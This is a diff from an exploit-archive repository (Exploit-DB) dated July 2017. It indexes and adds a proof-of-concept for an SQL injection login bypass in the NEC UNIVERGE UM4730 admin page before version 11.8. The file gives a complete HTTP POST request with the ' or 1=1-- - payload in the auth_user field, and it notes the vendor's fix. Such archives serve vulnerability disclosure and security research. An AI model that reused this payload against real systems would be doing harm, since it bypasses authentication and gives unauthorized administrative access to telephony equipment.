DB: 2017-07-22

1 new exploits

NEC UNIVERGE UM4730 < 11.8 - SQL Injection

files.csv

@@ -38156,3 +38156,4 @@ id,file,description,date,author,platform,type,port
 42346,platforms/cgi/webapps/42346.txt,"Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection",2017-07-19,xort,cgi,webapps,0
 42347,platforms/php/webapps/42347.txt,"Joomla! Component JoomRecipe 1.0.4 - 'search_author' Parameter SQL Injection",2017-07-20,Teng,php,webapps,0
 42351,platforms/php/webapps/42351.txt,"WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting",2017-07-20,8bitsec,php,webapps,0
+42353,platforms/php/webapps/42353.txt,"NEC UNIVERGE UM4730 < 11.8 - SQL Injection",2017-07-21,b0x41s,php,webapps,0

platforms/php/webapps/42353.txt

@@ -0,0 +1,29 @@
+# Exploit Title: NEC UNIVERGE UM4730 < 11.8 SQL injection
+# Vulnerbility: SQL injection login bypass
+# Date: 15-12-2016
+# Exploit Author: b0x41s
+# Author web: https://www.xrayit.nl
+# Vendor Homepage: https://www.nec-enterprise.com
+# Category: webapps
+# Version: 11.6.0.31
+# Tested on: Windows server 2008
+
+Description:
+The auth_user parameter is vulnerable to SQL injection.
+The login can be bypassed.
+
+POC:
+POST /admin/index.php HTTP/1.1
+Host: 127.0.0.1
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Referer: https://127.0.0.1/admin/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Lenght: 105
+Cookie: PHPSESSID=dadu22lsue7utch05a24lgp54; g_lang=en
+submitButton=submitButton%3dSing+in&formSubmitted=1&auth_pw=root&auth_user='%20or%201=1--%20-&login_language_select=de
+
+Fix answer from vendor:
+The WAC login page is no longer available to sql injection bypassing authentication.The fix was committed prior to releasing 11.8.